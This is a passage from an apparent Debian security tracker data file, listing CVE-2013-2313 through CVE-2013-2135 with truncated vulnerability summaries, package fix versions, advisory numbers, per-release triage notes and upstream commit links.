	NOT-FOR-US: LOCKON EC-CUBE
CVE-2013-2313 (Session fixation vulnerability in LOCKON EC-CUBE 2.11.0 through 2.12.3 ...)
	NOT-FOR-US: LOCKON EC-CUBE
CVE-2013-2312 (Cross-site scripting (XSS) vulnerability in the shopping-cart screen i ...)
	NOT-FOR-US: LOCKON EC-CUBE
CVE-2013-2311 (Cross-site scripting (XSS) vulnerability in static/js/share.js (aka th ...)
	- web2py (Vulnerable code not present)
CVE-2013-2310 (SoftBank Wi-Fi Spot Configuration Software, as used on SoftBank SHARP ...)
	NOT-FOR-US: SoftBank Wi-Fi Spot Configuration Software
CVE-2013-2309 (Cross-site scripting (XSS) vulnerability in the management screen in O ...)
	NOT-FOR-US: OpenPNE
CVE-2013-2308 (The (1) OWA Helper and (2) OSG Lite programs in SoftBank Online Servic ...)
	NOT-FOR-US: SoftBank Online Service Gate
CVE-2013-2307 (The Yahoo! Browser application before 1.4.3 for Android allows remote ...)
	NOT-FOR-US: Yahoo! Browser application for Android
CVE-2013-2306 (The jigbrowser+ application before 1.6.4 for Android does not properly ...)
	NOT-FOR-US: jigbrowser+ application for Android
CVE-2013-2305 (Cross-site request forgery (CSRF) vulnerability in Cybozu Office befor ...)
	NOT-FOR-US: Cybozu
CVE-2013-2304 (The Sleipnir Mobile application 2.8.0 and earlier and Sleipnir Mobile ...)
	NOT-FOR-US: Sleipnir
CVE-2013-2303 (Sleipnir 4.0.0.4000 and earlier on Windows allows remote attackers to ...)
	NOT-FOR-US: Sleipnir
CVE-2013-2302 (TransWARE Active! mail 6, when an external public interface is used, a ...)
	NOT-FOR-US: TransWARE Active! mail
CVE-2013-2301 (The OMRON OpenWnn application before 1.3.6 for Android uses weak permi ...)
	NOT-FOR-US: OpenWnn application
CVE-2013-2300 (The FlickWnn (aka OpenWnn/Flick support) application 2.02 and earlier ...)
	NOT-FOR-US: FlickWnn Android App
CVE-2013-2299 (Cross-site scripting (XSS) vulnerability in Advantech WebAccess (forme ...)
	NOT-FOR-US: Advantech WebAccess
CVE-2013-2298 (Multiple stack-based buffer overflows in the XML parser in BOINC 7.x a ...)
	- boinc 7.0.65+dfsg-1 (low)
	[wheezy] - boinc (Minor issue, only exploitable by a rogue BOINC server)
	[squeeze] - boinc (Minor issue, only exploitable by a rogue BOINC server)
	NOTE: http://boinc.berkeley.edu/gitweb/?p=boinc-v2.git;a=commitdiff;h=2fea03824925cbcb976f4191f4d8321e41a4d95b
CVE-2013-2297 (Eucalyptus EuStore sets a blank root password in the default configura ...)
	- eucalyptus
CVE-2013-2296 (Walrus in Eucalyptus before 3.2.2 does not verify authorization for th ...)
	- eucalyptus (bug #707592)
	NOTE: commit: https://github.com/eucalyptus/eucalyptus/commit/da7bb8b7c15d453e62df38eff5c12d0998e6eab1
	NOTE: https://eucalyptus.atlassian.net/browse/EUCA-3074
CVE-2013-2295
	RESERVED
CVE-2013-2294 (Multiple cross-site scripting (XSS) vulnerabilities in ViewGit before ...)
	NOT-FOR-US: ViewGit
CVE-2013-2293 (The CTransaction::FetchInputs method in bitcoind and Bitcoin-Qt before ...)
	- bitcoin 0.8.1-2 (bug #705265)
CVE-2013-2292 (bitcoind and Bitcoin-Qt 0.8.0 and earlier allow remote attackers to ca ...)
	- bitcoin 0.8.1-1
CVE-2013-2291
	RESERVED
CVE-2013-2290 (Cross-site scripting (XSS) vulnerability in the dashboard of the Aruba ...)
	NOT-FOR-US: Aruba Networks ArubaOS
CVE-2013-2289 (Cross-site scripting (XSS) vulnerability in admin/templates/default.ph ...)
	NOT-FOR-US: Batavi
CVE-2013-2288
	RESERVED
CVE-2013-2287 (Multiple cross-site scripting (XSS) vulnerabilities in views/notify.ph ...)
	NOT-FOR-US: WordPress plugin Uploader
CVE-2013-2286
	RESERVED
CVE-2013-2285
	RESERVED
CVE-2013-2284
	RESERVED
CVE-2013-2283
	RESERVED
CVE-2013-2282
	RESERVED
CVE-2013-2281
	RESERVED
CVE-2013-2280
	RESERVED
CVE-2013-2279 (CA SiteMinder Federation (FSS) 12.5, 12.0, and r6; Federation (Standal ...)
	NOT-FOR-US: CA SiteMinder
CVE-2013-2278 (Unspecified vulnerability in War FTP Daemon (warftpd) 1.82, when runni ...)
	NOT-FOR-US: War FTP Daemon
CVE-2013-2277 (The ff_h264_decode_seq_parameter_set function in h264_ps.c in libavcod ...)
	- ffmpeg 7:2.4.1-1
	[squeeze] - ffmpeg (Backports to 0.5.x not useful, too many checks missing)
	- libav 6:0.8.6-1 (bug #703200)
CVE-2013-2276 (The avcodec_decode_audio4 function in utils.c in libavcodec in FFmpeg ...)
	- ffmpeg (Doesn't affect libav, specific to current ffmpeg)
	- libav (Doesn't affect libav, specific to current ffmpeg)
CVE-2013-2275 (The default configuration for puppet masters 0.25.0 and later in Puppe ...)
	{DSA-2643-1}
	- puppet 2.7.18-3
CVE-2013-2274 (Puppet 2.6.x before 2.6.18 and Puppet Enterprise 1.2.x before 1.2.7 al ...)
	{DSA-2643-1}
	- puppet 2.7-1
	NOTE: Only affects puppet 2.6.x
CVE-2013-2273 (bitcoind and Bitcoin-Qt before 0.4.9rc1, 0.5.x before 0.5.8rc1, 0.6.0 ...)
	- bitcoin 0.8.1-1
CVE-2013-2272 (The penny-flooding protection mechanism in the CTxMemPool::accept meth ...)
	- bitcoin 0.8.1-2 (bug #705266)
CVE-2013-2271 (The D-Link DSL-2740B Gateway with firmware EU_1.0, when an active admi ...)
	NOT-FOR-US: D-Link DSL-2740B Gateway
CVE-2013-2270 (Cross-site scripting (XSS) vulnerability in the administration page in ...)
	NOT-FOR-US: Airvana
CVE-2013-2269 (The Sponsorship Confirmation functionality in Aruba Networks ClearPass ...)
	NOT-FOR-US: Aruba Networks ClearPass
CVE-2013-2268 (Unspecified vulnerability in the MathML implementation in WebKit in Go ...)
	- chromium-browser 25.0.1364.97-1
	[squeeze] - chromium-browser (Vulnerable code not present)
	NOTE: MathML added in chromium 24.x, disabled again in 25.x
CVE-2013-2267 (PHP Code Injection vulnerability in FUDforum Bulletin Board Software 3 ...)
	NOT-FOR-US: FUDforum
CVE-2013-2266 (libdns in ISC BIND 9.7.x and 9.8.x before 9.8.4-P2, 9.8.5 before 9.8.5 ...)
	{DSA-2656-1}
	- bind9 1:9.8.4.dfsg.P1-6+nmu1 (bug #704174)
CVE-2013-2265
	RESERVED
CVE-2013-2264 (The SIP channel driver in Asterisk Open Source 1.8.x before 1.8.20.2, ...)
	- asterisk 1:1.8.13.1~dfsg-2 (low; bug #704114)
	[squeeze] - asterisk (Minor information leak)
	NOTE: https://issues.asterisk.org/jira/browse/ASTERISK-21013
CVE-2013-2263 (Unspecified vulnerability in Citrix Access Gateway Standard Edition 5. ...)
	NOT-FOR-US: Citrix Access Gateway
CVE-2013-2262 (Cryptocat strophe.js before 2.0.22 has information disclosure ...)
	NOT-FOR-US: Cryptocat
CVE-2013-2261 (Cryptocat before 2.0.22 Chrome Extension 'img/keygen.gif' has Informat ...)
	NOT-FOR-US: Cryptocat
CVE-2013-2260 (Cryptocat before 2.0.22: Cryptocat.random() Function Array Key has Ent ...)
	NOT-FOR-US: Cryptocat
CVE-2013-2259 (Cryptocat before 2.0.22 has Arbitrary Code Execution on Firefox Conver ...)
	NOT-FOR-US: Cryptocat
CVE-2013-2258 (Cryptocat before 2.0.22 has Nickname User Impersonation ...)
	NOT-FOR-US: Cryptocat
CVE-2013-2257 (Cryptocat before 2.0.42 has Group Chat ECC Private Key Generation Brut ...)
	NOT-FOR-US: Cryptocat
CVE-2013-2256 (OpenStack Compute (Nova) before 2013.1.3 and Havana before havana-2 do ...)
	- nova 2013.1.2-3 (bug #718905)
	[wheezy] - nova (Affected code not present)
CVE-2013-2255 (HTTPSConnections in OpenStack Keystone 2013, OpenStack Compute 2013.1, ...)
	- keystone 2014.1-1
	[wheezy] - keystone (Minor issue)
	- swift (See https://bugs.launchpad.net/keystone/+bug/1188189/comments/5)
	NOTE: Fixes for keystone: https://review.openstack.org/#/c/76476/
CVE-2013-2254 (The deepGetOrCreateNode function in impl/operations/AbstractCreateOper ...)
	NOT-FOR-US: Apache Sling
CVE-2013-2253
	RESERVED
CVE-2013-2252
	RESERVED
CVE-2013-2251 (Apache Struts 2.0.0 through 2.3.15 allows remote attackers to execute ...)
	- libstruts1.2-java (Only affects 2.x)
CVE-2013-2250 (Apache Open For Business Project (aka OFBiz) 10.04.01 through 10.04.05 ...)
	NOT-FOR-US: Apache OFBiz
CVE-2013-2249 (mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Ser ...)
	- apache2 2.4.6-1
	[wheezy] - apache2 (mod_session_dbd available in apache 2.3 and later only)
	[squeeze] - apache2 (mod_session_dbd available in apache 2.3 and later only)
CVE-2013-2248 (Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through ...)
	- libstruts1.2-java (Only affects 2.x)
CVE-2013-2247 (The Fast Permissions Administration module 6.x-2.x before 6.x-2.5 and ...)
	NOT-FOR-US: Fast Permissions Administration Drupal contributed module
CVE-2013-2246 (mod/feedback/lib.php in Moodle through 2.1.10, 2.2.x before 2.2.11, 2. ...)
	- moodle 2.5.1-1 (low)
	[squeeze] - moodle (Minor issue)
	NOTE: https://moodle.org/mod/forum/discuss.php?d=232503
CVE-2013-2245 (rss/file.php in Moodle through 2.1.10, 2.2.x before 2.2.11, 2.3.x befo ...)
	- moodle 2.5.1-1 (low)
	[squeeze] - moodle (Minor issue)
	NOTE: https://moodle.org/mod/forum/discuss.php?d=232502
CVE-2013-2244 (Multiple cross-site scripting (XSS) vulnerabilities in lib/conditionli ...)
	- moodle (Only affects 2.4.x and 2.5.x)
	NOTE: https://moodle.org/mod/forum/discuss.php?d=232501
CVE-2013-2243 (mod/lesson/pagetypes/matching.php in Moodle through 2.2.11, 2.3.x befo ...)
	- moodle 2.5.1-1 (low)
	[squeeze] - moodle (Minor issue)
	NOTE: https://moodle.org/mod/forum/discuss.php?d=232500
CVE-2013-2242 (mod/chat/gui_sockets/index.php in Moodle through 2.1.10, 2.2.x before ...)
	- moodle 2.5.1-1 (low)
	[squeeze] - moodle (Minor issue)
	NOTE: https://moodle.org/mod/forum/discuss.php?d=232498
CVE-2013-2241 (modules/gallery/helpers/data_rest.php in Gallery 3 before 3.0.9 allows ...)
	- gallery3 (bug #511715)
CVE-2013-2240 (lib/flowplayer.swf.php in Gallery 3 before 3.0.9 does not properly rem ...)
	- gallery3 (bug #511715)
CVE-2013-2239 (vzkernel before 042stab080.2 in the OpenVZ modification for the Linux ...)
	{DSA-2766-1}
	- linux-2.6 (low)
	- linux (openvz flavour no longer included after Squeeze)
CVE-2013-2238 (Multiple buffer overflows in the switch_perform_substitution function ...)
	- freeswitch (bug #389591)
CVE-2013-2237 (The key_notify_policy_flush function in net/key/af_key.c in the Linux ...)
	{DSA-2766-1 DSA-2745-1}
	- linux-2.6 (low)
	- linux 3.9.4-1 (low)
	NOTE: https://github.com/torvalds/linux/commit/85dfb745ee40232876663ae206cba35f24ab2a40
CVE-2013-2236 (Stack-based buffer overflow in the new_msg_lsa_change_notify function ...)
	{DSA-2803-1}
	- quagga 0.99.22.4-1 (bug #726724)
	NOTE: http://lists.quagga.net/pipermail/quagga-dev/2013-July/010621.html
CVE-2013-2235
	RESERVED
CVE-2013-2234 (The (1) key_notify_sa_flush and (2) key_notify_policy_flush functions ...)
	{DSA-2766-1 DSA-2745-1}
	- linux-2.6
	- linux 3.10.1-1
CVE-2013-2233 (Ansible before 1.2.1 makes it easier for remote attackers to conduct m ...)
	- ansible 1.3.4+dfsg-1 (bug #714822)
	NOTE: https://github.com/ansible/ansible/issues/857
CVE-2013-2232 (The ip6_sk_dst_check function in net/ipv6/ip6_output.c in the Linux ke ...)
	{DSA-2766-1 DSA-2745-1}
	- linux-2.6
	- linux 3.10.1-1
CVE-2013-2231 (Unquoted Windows search path vulnerability in the QEMU Guest Agent ser ...)
	- qemu (Only affects win32 build)
CVE-2013-2230 (The qemu driver (qemu/qemu_driver.c) in libvirt before 1.1.1 allows re ...)
	- libvirt 1.1.0-3 (bug #715559)
	[jessie] - libvirt (Vulnerable code introduced with commit abf75aea)
	[wheezy] - libvirt (Vulnerable code introduced with commit abf75aea)
	[squeeze] - libvirt (Vulnerable code introduced with commit abf75aea)
CVE-2013-2229
	REJECTED
CVE-2013-2228 (SaltStack RSA Key Generation allows remote users to decrypt communicat ...)
	- salt 0.15.1-1
	NOTE: https://github.com/saltstack/salt/commit/e8ce66cf688b43aeb3e716e78b1af3a08e9940e3
CVE-2013-2227 (GLPI 0.83.7 has Local File Inclusion in common.tabs.php. ...)
	- glpi 0.83.91-1 (bug #714720; unimportant)
	NOTE: Only supported behind an authenticated HTTP zone
CVE-2013-2226 (Multiple SQL injection vulnerabilities in GLPI before 0.83.9 allow rem ...)
	- glpi 0.83.91-1 (bug #714720; unimportant)
	NOTE: Only supported behind an authenticated HTTP zone
CVE-2013-2225 (inc/ticket.class.php in GLPI 0.83.9 and earlier allows remote attacker ...)
	- glpi 0.83.91-1 (bug #714720; unimportant)
	NOTE: Only supported behind an authenticated HTTP zone
CVE-2013-2224 (A certain Red Hat patch for the Linux kernel 2.6.32 on Red Hat Enterpr ...)
	- linux-2.6 (Caused by RHEL backport)
	- linux (Caused by RHEL backport)
CVE-2013-2223 (GNU ZRTPCPP before 3.2.0 allows remote attackers to obtain sensitive i ...)
	- libzrtpcpp 2.3.4-1 (bug #714650)
	[squeeze] - libzrtpcpp (Minor issue)
	[wheezy] - libzrtpcpp (Minor issue)
CVE-2013-2222 (Multiple stack-based buffer overflows in GNU ZRTPCPP before 3.2.0 allo ...)
	- libzrtpcpp 2.3.4-1 (bug #714650)
	[squeeze] - libzrtpcpp (Minor issue)
	[wheezy] - libzrtpcpp (Minor issue)
CVE-2013-2221 (Heap-based buffer overflow in the ZRtp::storeMsgTemp function in GNU Z ...)
	- libzrtpcpp 2.3.4-1 (bug #714650)
	[squeeze] - libzrtpcpp (Minor issue)
	[wheezy] - libzrtpcpp (Minor issue)
CVE-2013-2220 (Buffer overflow in the radius_get_vendor_attr function in the Radius e ...)
	{DSA-2726-1}
	- php-radius 1.2.5-2.4 (bug #714362)
	NOTE: https://www.openwall.com/lists/oss-security/2013/06/28/2
CVE-2013-2219 (The Red Hat Directory Server before 8.2.11-13 and 389 Directory Server ...)
	- 389-ds-base 1.3.2.9-1 (bug #718325)
CVE-2013-2218 (Double free vulnerability in the virConnectListAllInterfaces method in ...)
	- libvirt 1.1.0-1 (bug #714699)
	[jessie] - libvirt (Vulnerable code introduced in 1.0.6)
	[wheezy] - libvirt (Vulnerable code introduced in 1.0.6)
	[squeeze] - libvirt (Vulnerable code introduced in 1.0.6)
	NOTE: http://libvirt.org/git/?p=libvirt.git;a=commit;h=244e0b8cf15ca2ef48d82058e728656e6c4bad11
	NOTE: Vulnerable code introduced in http://libvirt.org/git/?p=libvirt.git;a=commit;h=7ac2c4fe624f30f2c8270116513fa2ddab07631f
CVE-2013-2217 (cache.py in Suds 0.4, when tempdir is set to None, allows local users ...)
	- suds 0.4.1-8 (low; bug #714340)
	[squeeze] - suds 0.3.9-1+deb6u1
	[wheezy] - suds 0.4.1-5+deb7u1
CVE-2013-2216
	RESERVED
CVE-2013-2215
	REJECTED
CVE-2013-2214 (status.cgi in Nagios 4.0 before 4.0 beta4 and 3.x before 3.5.1 does no ...)
	- nagios3 3.4.1-4 (low)
	[wheezy] - nagios3 3.4.1-3+deb7u1
	[squeeze] - nagios3 (disputed, minor issue)
	NOTE: Disputed issue; claimed to work as designed, may be rejected
CVE-2013-2213 (The KRandom::random function in KDE Paste Applet after 4.10.5 in kdepl ...)
	- kdeplasma-addons (only affects if the incomplete patch for CVE-2013-2120 is applied)
CVE-2013-2212 (The vmx_set_uc_mode function in Xen 3.3 through 4.3, when disabling ca ...)
	- xen 4.3.0-1 (unimportant)
	NOTE: Hardware design flaw, no software solution
	NOTE: http://xenbits.xen.org/xsa/advisory-60.html
CVE-2013-2211 (The libxenlight (libxl) toolstack library in Xen 4.0.x, 4.1.x, and 4.2 ...)
	{DSA-3006-1}
	- xen 4.3.0-1
	[squeeze] - xen (libxl not packaged in squeeze)
CVE-2013-2210 (Heap-based buffer overflow in the XML Signature Reference functionalit ...)
	{DSA-2717-1}
	- xml-security-c 1.6.1-7 (bug #714241)
	NOTE: http://santuario.apache.org/secadv.data/CVE-2013-2210.txt
CVE-2013-2209 (Cross-site scripting (XSS) vulnerability in the auto-complete widget i ...)
	NOT-FOR-US: Reviewboard (this was once in experimental, but removed later on)
CVE-2013-2208 (tpp 1.3.1 allows remote attackers to execute arbitrary commands via a ...)
	- tpp 1.3.1-3 (low; bug #706644)
	[squeeze] - tpp (Minor issue)
	[wheezy] - tpp (Minor issue)
CVE-2013-2207 (pt_chown in GNU C Library (aka glibc or libc6) before 2.18 does not pr ...)
	- eglibc
	[squeeze] - eglibc (Minor issue)
	[wheezy] - eglibc (Minor issue)
	- glibc 2.21-1 (low; bug #717544)
	[jessie] - glibc 2.19-18+deb8u4
	NOTE: Patch: https://sourceware.org/git/?p=glibc.git;a=commit;h=e4608715e6e1dd2adc91982fd151d5ba4f761d69
CVE-2013-2206 (The sctp_sf_do_5_2_4_dupcook function in net/sctp/sm_statefuns.c in th ...)
	{DSA-2766-1}
	- linux-2.6
	- linux 3.9.4-1
	[wheezy] - linux 3.2.46-1
CVE-2013-2205 (The default configuration of SWFUpload in WordPress before 3.5.2 has a ...)
	{DSA-2718-1}
	- wordpress 3.5.2+dfsg-1 (bug #713947)
CVE-2013-2204 (moxieplayer.as in Moxiecode moxieplayer, as used in the TinyMCE Media ...)
	{DSA-2718-1}
	- wordpress 3.5.2+dfsg-1 (bug #713947)
CVE-2013-2203 (WordPress before 3.5.2, when the uploads directory forbids write acces ...)
	{DSA-2718-1}
	- wordpress 3.5.2+dfsg-1 (bug #713947)
CVE-2013-2202 (WordPress before 3.5.2 allows remote attackers to read arbitrary files ...)
	{DSA-2718-1}
	- wordpress 3.5.2+dfsg-1 (bug #713947)
CVE-2013-2201 (Multiple cross-site scripting (XSS) vulnerabilities in WordPress befor ...)
	{DSA-2718-1}
	- wordpress 3.5.2+dfsg-1 (bug #713947)
CVE-2013-2200 (WordPress before 3.5.2 does not properly check the capabilities of rol ...)
	{DSA-2718-1}
	- wordpress 3.5.2+dfsg-1 (bug #713947)
CVE-2013-2199 (The HTTP API in WordPress before 3.5.2 allows remote attackers to send ...)
	{DSA-2718-1}
	- wordpress 3.5.2+dfsg-1 (bug #713947)
CVE-2013-2198 (The Login Security module 6.x-1.x before 6.x-1.3 and 7.x-1.x before 7. ...)
	NOT-FOR-US: Login Security Drupal contributed module
CVE-2013-2197 (The Login Security module 6.x-1.x before 6.x-1.3 and 7.x-1.x before 7. ...)
	NOT-FOR-US: Login Security Drupal contributed module
CVE-2013-2196 (Multiple unspecified vulnerabilities in the Elf parser (libelf) in Xen ...)
	{DSA-3006-1}
	- xen 4.3.0-1
	[squeeze] - xen (Unsupported in squeeze-lts)
CVE-2013-2195 (The Elf parser (libelf) in Xen 4.2.x and earlier allow local guest adm ...)
	{DSA-3006-1}
	- xen 4.3.0-1
	[squeeze] - xen (Unsupported in squeeze-lts)
CVE-2013-2194 (Multiple integer overflows in the Elf parser (libelf) in Xen 4.2.x and ...)
	{DSA-3006-1}
	- xen 4.3.0-1
	[squeeze] - xen (Unsupported in squeeze-lts)
CVE-2013-2193 (Apache HBase 0.92.x before 0.92.3 and 0.94.x before 0.94.9, when the K ...)
	NOT-FOR-US: Apache HBase
	NOTE: The package was in unstable, but never in a release, see #630821
CVE-2013-2192 (The RPC protocol implementation in Apache Hadoop 2.x before 2.0.6-alph ...)
	NOT-FOR-US: Apache Hadoop
	NOTE: The package was in unstable, but never in a release, see #630820
CVE-2013-2191 (python-bugzilla before 0.9.0 does not validate X.509 certificates, whi ...)
	NOT-FOR-US: python-bugzilla
CVE-2013-2190 (The translate_hierarchy_event function in x11/clutter-device-manager-x ...)
	- clutter-1.0 1.14.4-3 (low; bug #714264)
	[squeeze] - clutter-1.0 (Minor issue)
	[wheezy] - clutter-1.0 (Minor issue)
	NOTE: https://bugzilla.gnome.org/show_bug.cgi?id=701974
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=954054
CVE-2013-2189 (Apache OpenOffice.org (OOo) before 4.0 allows remote attackers to caus ...)
	- libreoffice 1:3.4.3-1 (unimportant)
	- openoffice.org 1:3.3.0-1 (unimportant)
	NOTE: Since 3.3.0 openoffice.org is a transitional source package
	NOTE: Plain crasher, not treated as a security issue
CVE-2013-2188 (A certain Red Hat patch to the do_filp_open function in fs/namei.c in ...)
	- linux-2.6 (RHEL-specific issue)
	- linux (RHEL-specific issue)
CVE-2013-2187 (Cross-site scripting (XSS) vulnerability in Apache Archiva 1.2 through ...)
	NOT-FOR-US: Apache Archiva
CVE-2013-2186 (The DiskFileItem class in Apache Commons FileUpload, as used in Red Ha ...)
	{DSA-2827-1}
	- libcommons-fileupload-java 1.3-2.1 (bug #726601)
	- jenkins 1.565.3-1 (bug #763899)
CVE-2013-2185 (** DISPUTED ** The readObject method in the DiskFileItem class in Apac ...)
	NOT-FOR-US: Red Hat JBoss Enterprise Application Platform
	NOTE: https://bugzilla.redhat.com/show_bug.cgi?id=974813
	NOTE: https://www.openwall.com/lists/oss-security/2013/09/05/4
CVE-2013-2184 (Movable Type before 5.2.6 does not properly use the Storable::thaw fun ...)
	{DSA-3183-1}
	- movabletype-opensource 5.2.7+dfsg-1 (bug #712602)
	[squeeze] - movabletype-opensource (Minor issue)
	NOTE: http://seclists.org/oss-sec/2013/q2/568
	NOTE: http://www.movabletype.org/documentation/appendices/release-notes/movable-type-526-release-notes.html
CVE-2013-2183 (Monkey HTTP Daemon has local security bypass ...)
	- monkey (low)
	[squeeze] - monkey (Minor issue)
CVE-2013-2182 (The Mandril security plugin in Monkey HTTP Daemon (monkeyd) before 1.5 ...)
	- monkey (low)
	[squeeze] - monkey (Minor issue)
CVE-2013-2181 (Cross-site scripting (XSS) vulnerability in the Directory Listing plug ...)
	- monkey (low)
	[squeeze] - monkey (Minor issue)
CVE-2013-2180
	RESERVED
	NOT-FOR-US: uk-cookie Wordpress plugin
CVE-2013-2179 (X.Org xdm 1.1.10, 1.1.11, and possibly other versions, when performing ...)
	- xdm (Not affected when PAM is used)
	[squeeze] - xdm (same as above and glibc too old)
	[wheezy] - xdm (same as above and glibc too old)
	NOTE: https://www.openwall.com/lists/oss-security/2013/06/11/5
CVE-2013-2178 (The apache-auth.conf, apache-nohome.conf, apache-noscript.conf, and ap ...)
	{DSA-2708-1}
	- fail2ban 0.8.10-1
CVE-2013-2177 (Cross-site scripting (XSS) vulnerability in the Display Suite module 7 ...)
	NOT-FOR-US: third party drupal module (Display Suite)
CVE-2013-2176 (Unquoted Windows search path vulnerability in the Red Hat Enterprise V ...)
	NOT-FOR-US: Red Hat Enterprise Virtualization Apt service
CVE-2013-2175 (HAProxy 1.4 before 1.4.24 and 1.5 before 1.5-dev19, when configured to ...)
	{DSA-2711-1}
	- haproxy 1.4.24-1
CVE-2013-2174 (Heap-based buffer overflow in the curl_easy_unescape function in lib/e ...)
	{DSA-2713-1}
	- curl 7.31.0-1
CVE-2013-2173 (wp-includes/class-phpass.php in WordPress 3.5.1, when a password-prote ...)
	{DSA-2718-1}
	- wordpress 3.5.2+dfsg-1 (bug #713947)
CVE-2013-2172 (jcp/xml/dsig/internal/dom/DOMCanonicalizationMethod.java in Apache San ...)
	{DSA-3065-1 DLA-85-1}
	- libxml-security-java 1.5.5-2 (bug #720375)
	NOTE: http://santuario.apache.org/secadv.data/CVE-2013-2172.txt.asc
CVE-2013-2171 (The vm_map_lookup function in sys/vm/vm_map.c in the mmap implementati ...)
	{DSA-2714-1}
	- kfreebsd-9 9.0-12 (bug #712664)
	- kfreebsd-8 (Only affects 9.x)
CVE-2013-2170
	REJECTED
CVE-2013-2169
	REJECTED
CVE-2013-2168 (The _dbus_printf_string_upper_bound function in dbus/dbus-sysdeps-unix ...)
	{DSA-2707-1}
	- dbus 1.6.12-1
	[squeeze] - dbus (Introduced in 1.4.16)
CVE-2013-2167 (python-keystoneclient version 0.2.3 to 0.2.5 has middleware memcache s ...)
	- python-keystoneclient 1:0.2.5-2 (bug #713819)
	[wheezy] - python-keystoneclient (Vulnerable code not present)
CVE-2013-2166 (python-keystoneclient version 0.2.3 to 0.2.5 has middleware memcache e ...)
	- python-keystoneclient 1:0.2.5-2 (bug #713819)
	[wheezy] - python-keystoneclient (Vulnerable code not present)
CVE-2013-2165 (ResourceBuilderImpl.java in the RichFaces 3.x through 5.x implementati ...)
	- jbossas4 (Only builds a few libraries, not the full application server, #581226)
CVE-2013-2164 (The mmc_ioctl_cdrom_read_data function in drivers/cdrom/cdrom.c in the ...)
	{DSA-2766-1 DSA-2745-1}
	- linux-2.6 (low)
	- linux 3.9.8-1 (low)
CVE-2013-2163 (Monkey HTTP Daemon (monkeyd) before 1.2.2 allows remote attackers to c ...)
	- monkey (low)
	[squeeze] - monkey (Minor issue)
CVE-2013-2162 (Race condition in the post-installation script (mysql-server-5.5.posti ...)
	{DSA-2818-1 DLA-75-1}
	- mysql-5.5 5.5.35+dfsg-1 (low; bug #711600)
	- mysql-5.1 (low)
	[squeeze] - mysql-5.1 (Minor issue, can be included in a future DSA)
CVE-2013-2161 (XML injection vulnerability in account/utils.py in OpenStack Swift Fol ...)
	{DSA-2737-1}
	- swift 1.8.0-6 (low; bug #712202)
	[wheezy] - swift 1.4.8-2+deb7u1
CVE-2013-2160 (The streaming XML parser in Apache CXF 2.5.x before 2.5.10, 2.6.x befo ...)
	NOT-FOR-US: Apache CXF
CVE-2013-2159 (Monkey HTTP Daemon: broken user name authentication ...)
	- monkey
	[squeeze] - monkey (Minor issue)
CVE-2013-2158 (Cross-site request forgery (CSRF) vulnerability in the Services module ...)
	NOT-FOR-US: Services Drupal contributed modules
CVE-2013-2157 (OpenStack Keystone Folsom, Grizzly before 2013.1.3, and Havana, when u ...)
	- keystone 2013.1.2-1 (bug #712160)
	[wheezy] - keystone (Vulnerable code not present)
CVE-2013-2156 (Heap-based buffer overflow in the Exclusive Canonicalization functiona ...)
	{DSA-2710-1}
	- xml-security-c 1.6.1-6
CVE-2013-2155 (Apache Santuario XML Security for C++ (aka xml-security-c) before 1.7. ...)
	{DSA-2710-1}
	- xml-security-c 1.6.1-6
CVE-2013-2154 (Stack-based buffer overflow in the XML Signature Reference functionali ...)
	{DSA-2710-1}
	- xml-security-c 1.6.1-6
CVE-2013-2153 (The XML digital signature functionality (xsec/dsig/DSIGReference.cpp) ...)
	{DSA-2710-1}
	- xml-security-c 1.6.1-6
CVE-2013-2152 (Unquoted Windows search path vulnerability in the SPICE service, as us ...)
	NOT-FOR-US: Spice service for Windows
CVE-2013-2151 (Unquoted Windows search path vulnerability in Red Hat Enterprise Virtu ...)
	NOT-FOR-US: RHEV Agent for Windows
CVE-2013-2150 (Multiple cross-site scripting (XSS) vulnerabilities in js/viewer.js in ...)
	- owncloud (affects only experimental version)
CVE-2013-2149 (Multiple cross-site scripting (XSS) vulnerabilities in ownCloud before ...)
	- owncloud 4.0.16debian-1 (bug #711517)
CVE-2013-2148 (The fill_event_metadata function in fs/notify/fanotify/fanotify_user.c ...)
	{DSA-2745-1}
	- linux-2.6 (low)
	[squeeze] - linux-2.6 (fanotify introduced in 2.6.36)
	- linux 3.9.8-1 (low)
CVE-2013-2147 (The HP Smart Array controller disk-array driver and Compaq SMART2 cont ...)
	{DSA-2906-1}
	- linux-2.6 (low)
	- linux 3.11.5-1 (low)
	[wheezy] - linux 3.2.53-1
CVE-2013-2146 (arch/x86/kernel/cpu/perf_event_intel.c in the Linux kernel before 3.8. ...)
	- linux-2.6 (Introduced in 3.1)
	- linux 3.9.4-1
	[wheezy] - linux 3.2.46-1
CVE-2013-2145 (The cpansign verify functionality in the Module::Signature module befo ...)
	- libmodule-signature-perl 0.73-1 (bug #711239)
	[wheezy] - libmodule-signature-perl 0.68-1+deb7u1
	[squeeze] - libmodule-signature-perl 0.63-1+squeeze1
CVE-2013-2144 (Red Hat Enterprise Virtualization Manager (RHEVM) before 3.2 does not ...)
	NOT-FOR-US: RHEV Manager
CVE-2013-2143 (The users controller in Katello 1.5.0-14 and earlier, and Red Hat Sate ...)
	NOT-FOR-US: Katello
CVE-2013-2142 (userpref.c in libimobiledevice 1.1.4, when $HOME and $XDG_CONFIG_HOME ...)
	- libimobiledevice 1.1.5-0.1 (low; bug #710885)
	[squeeze] - libimobiledevice (Vulnerable code was introduced later)
	[wheezy] - libimobiledevice (Vulnerable code was introduced later)
CVE-2013-2141 (The do_tkill function in kernel/signal.c in the Linux kernel before 3. ...)
	{DSA-2766-1 DSA-2669-1}
	- linux-2.6
	- linux 3.9.4-1
CVE-2013-2140 (The dispatch_discard_io function in drivers/block/xen-blkback/blkback. ...)
	- linux-2.6 (Vulnerable code not present)
	- linux 3.10.1-1
	[wheezy] - linux (Vulnerable code not present)
CVE-2013-2139 (Buffer overflow in srtp.c in libsrtp in srtp 1.4.5 and earlier allows ...)
	{DSA-2840-1}
	- srtp 1.4.5~20130609~dfsg-1 (bug #711163)
CVE-2013-2138 (The (1) uploadify and (2) flowplayer SWF files in Gallery 3 before 3.0 ...)
	- gallery (Old 1.5 version not affected)
CVE-2013-2137 (Cross-site scripting (XSS) vulnerability in the "View Log" screen in t ...)
	NOT-FOR-US: Apache OFBiz
CVE-2013-2136 (Multiple cross-site scripting (XSS) vulnerabilities in Apache CloudSta ...)
	NOT-FOR-US: Apache CloudStack
CVE-2013-2135 (Apache Struts 2 before 2.3.14.3 allows remote attackers to execute arb ...)
